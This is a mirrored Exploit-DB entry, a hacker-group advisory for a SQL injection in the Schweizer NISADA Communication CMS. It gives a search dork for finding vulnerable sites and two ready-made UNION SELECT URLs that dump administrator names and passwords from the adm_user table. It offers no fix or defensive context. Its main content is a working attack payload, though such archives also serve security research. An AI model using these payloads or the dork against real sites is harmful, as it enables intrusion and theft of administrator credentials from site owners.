bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/10543.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

35 lines
No EOL
1.4 KiB
Text
Raw Blame History

ALGERIAN HACKER
**********************- NORTH-AFRICA SECURITY TEAM -***********************
[!] Schweizer NISADA Communication CMS SQL Injection Vulnerability
[!] Author : Dr.0rYX and Cr3w-DZ
[!] MAIL : vx3@hotmail.de<mailto:vx3@hotmail.de> & Cr3w@hotmail.de<mailto:Cr3w@hotmail.de>
***************************************************************************/
[ Software Information ]
[+] Vendor : http://www.nisada.ch/
[+] script : Schweizer NISADA Communication CMS
[+] Download : http://www.nisada.ch/contact.aspx (sell script )
[+] Vulnerability : SQL injection
[+] Dork :inurl:"/CMS/page.php?p="
**************************************************************************/
[ Vulnerable File ]
http://server/cms/page.php?p=1&img=[N.A.S.T ]
[ Exploit ]
http://server/cms/page.php?p=1&img=-1+UNION+ALL+select+1,2,3,4,5,GROUP_concat(CONVERT(num USING utf8),0x3a,CONVERT(user USINGutf8),0x3a,CONVERT(pswd USING utf8)),7,8,9,10,11,12,13,14+from+adm_user
[ ExOMPLE ]
http://server/cms/page.php?p=1&img=-207+UNION+ALL+select+1,2,3,4,5,GROUP_concat%28CONVERT%28num%20USING%20utf8%29,0x3a,CONVERT%28user%20USING%20utf8%29,0x3a,CONVERT%28pswd%20USING%20utf8%29%29,7,8,9,10,11,12,13,14+from+adm_user
[ GReet ]
[+] :claw ,xCv-DZ , HIS0K4 ,le0n ,www.arab-zone.org , exploit-db.com , ALL HACKERS MUSLIMS
Reference in a new issue View git blame Copy permalink